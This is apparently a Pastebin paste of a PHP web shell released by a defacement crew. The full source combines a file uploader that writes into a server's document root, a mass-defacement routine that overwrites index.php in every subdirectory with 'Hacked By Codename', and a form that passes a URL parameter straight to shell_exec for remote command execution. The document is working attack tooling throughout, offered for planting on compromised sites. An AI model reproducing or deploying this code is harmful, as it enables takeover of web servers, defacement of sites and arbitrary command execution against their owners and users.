Tersakiti

MiniWeb

Jul 2nd, 2018
463
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.29 KB | None | 0 0
  1. <html>
  2. <head>
  3. <link rel="shortcut icon" href="https://1.bp.blogspot.com/-Um9UjXjVTEg/WQUeHug4BvI/AAAAAAAAMYE/Rkq54qpv0bc1oNYUuJwtdGtKnxXio1dKwCEw/s320/logo+dream+league+soccer+one+piece+ace.png">
  4. <iframe width="0" height="0" scrolling="no" frameborder="no" allow="autoplay" src="https://w.soundcloud.com/player/?url=https%3A//api.soundcloud.com/tracks/340659177&color=%23ff5500&auto_play=true&hide_related=false&show_comments=true&show_user=true&show_reposts=false&show_teaser=true&visual=true"></iframe>
  5. <title>&#1203;&#824;&#1202;&#824;&#1203; Uploader &#1203;&#824;&#1202;&#824;&#1203;</title>
  6. <script language="javascript"> alert ('Please Wait....') </script>
  7. <script language="javascript"> alert ('Please Wait....') </script>
  8. <script language="javascript"> alert ('Please Wait....') </script>
  9. <script language="javascript"> alert ('Happy Your Backdoor Upload') </script>
  10. <script language="javascript"> alert ('And Enjoy') </script>
  11. <script src="http://e-mete.com/js/kdsnow.js"></script> <style> body{ background-image: url(https://ibb.co/eC2DJo); background-repeat: no-repeat; background-attachment: fixed; background-position: top; background-color:#000000; position: relative; background-size:100% 100vh; } .logo { width: 300px; height: 300px; margin: 0 auto; margin-top: 50px; -webkit-filter: drop-shadow(0px 0px 7px #0080FF); filter: drop-shadow(0px 0px 7px #0080FF); } .logo:hover{ width: 300px; height: 300px; -webkit-filter: drop-shadow(0px 0px 10px #0080FF); opacity:0.4; filter:alpha(opacity=40); transition: opacity .2s ease-out; -moz-transition: opacity .2s ease-out; -webkit-transition: opacity .2s ease-out; -o-transition: opacity .2s ease-out; }</style>
  12. <table width="100%" height="100%"><td align=center>
  13. <br><table width="100%" height="100%"><td align=center><img src="https://vignette.wikia.nocookie.net/villains/images/c/cb/Speed-o%27-Sound_Sonic.png"</img><br>
  14. <br>
  15. <font face='Wallpoet' color='white' size=6px>EXI2T CYBER TEAM</font><font face='Wallpoet' color='red' size=6px> 2018</font><br><br>
  16. <p>
  17. <center><font color="red" font size="3">&#1203;&#824;&#1202;&#824;&#1203;<font color="white"> Codename<font color="red"> &#1203;&#824;&#1202;&#824;&#1203;</font></center>
  18. <br>
  19. <font color=white>
  20. <?php
  21. echo "Uploader By Codename &#1203;&#824;&#1202;&#824;&#1203; EXI2T CYBER TEAM<br>";
  22. echo "<b>".php_uname()."</b><br>";
  23. echo "<form method='post' enctype='multipart/form-data'>
  24. <input type='file' name='just_file'>
  25. <input type='submit' name='upload' value='Crooot'>
  26. </form>";
  27. $root = $_SERVER['DOCUMENT_ROOT'];
  28. $files = $_FILES['just_file']['name'];
  29. $dest = $root.'/'.$files;
  30. if(isset($_POST['upload'])) {
  31. if(is_writable($root)) {
  32. if(@copy($_FILES['just_file']['tmp_name'], $dest)) {
  33. $web = "http://".$_SERVER['HTTP_HOST']."/";
  34. echo "Sukses Upload Your File -> <a href='$web$files' target='_blank'><b><u>$web/$files</u></b></a>";
  35. } else {
  36. echo "Gagal Upload Di Document Root.";
  37. }
  38. } else {
  39. if(@copy($_FILES['just_file']['tmp_name'], $files)) {
  40. echo " Sukses Upload Your File -> <b>$files</b> Hope You're Happy";
  41. } else {
  42. echo "Forgive me";
  43. }
  44. }
  45. }
  46. echo "<title>Mass Defacer Server Folder</title>";
  47. echo "<link href='http://fonts.googleapis.com/css?family=Electrolize' rel='stylesheet' type='text/css'>";
  48. echo "<body bgcolor='gray'><font color=black'><font face='Electrolize'>";
  49. echo "<center><form method='POST'>";
  50. echo "<img src='https://1.bp.blogspot.com/-Um9UjXjVTEg/WQUeHug4BvI/AAAAAAAAMYE/Rkq54qpv0bc1oNYUuJwtdGtKnxXio1dKwCEw/s320/logo%20dream%20league%20soccer%20one%20piece%20ace.png'>
  51. <hr color='black'><font color='red'>[+] Main Directory:</font><br>
  52. <input cols='10' rows='10' type='text' style='color:lime;background-color:#000000' name='base_dir' value='".getcwd ()."'><br><br>";
  53. echo "<font color='red'>[+] Mass File:</font><br><input cols='10' rows='10' type='text' style='color:lime;background-color:#000000' name='andela' value='index.php'><br>";
  54. echo "<font color='red'>[+] Mass Defacement:</font><br><textarea cols='25' rows='8' style='color:lime;background-color:#000000;background-image:url(http://ac-team.ml/bg.jpg);' name='index'>Hacked By Codename</textarea><br>";
  55. echo "<input type='submit' value='Fire'></form></center>";
  56.  
  57. if (isset ($_POST['base_dir']))
  58. {
  59. if (!file_exists ($_POST['base_dir']))
  60. die ($_POST['base_dir']." Not Found !<br>");
  61.  
  62. if (!is_dir ($_POST['base_dir']))
  63. die ($_POST['base_dir']." Is Not A Directory !<br>");
  64.  
  65. @chdir ($_POST['base_dir']) or die ("Cannot Open Directory");
  66.  
  67. $files = @scandir ($_POST['base_dir']) or die ("Fuck u -_- <br>");
  68.  
  69. foreach ($files as $file):
  70. if ($file != "." && $file != ".." && @filetype ($file) == "dir")
  71. {
  72. $index = getcwd ()."/".$file."/".$_POST['andela'];
  73. if (file_put_contents ($index, $_POST['index']))
  74. echo "<hr color='black'>Status => <font color='black'>$index&nbsp&nbsp&nbsp&nbsp</font><font color='lime'>(Ok)</font>";
  75. }
  76. endforeach;
  77. }
  78. ?>
  79. </font></table></td></html>
  80. <form method=GET Action="">
  81. <?=$_SERVER['SERVER_ADDR'] ?>:~$<font size="3">
  82. <INPUT TYPE="text" NAME="id">
  83. <INPUT TYPE="submit" VALUE="Execute">
  84. <pre>
  85. <?php echo shell_exec($_GET['id'] . ' 2>&1'); ?>
  86. </pre>
Advertisement
Add Comment
Please, Sign In to add comment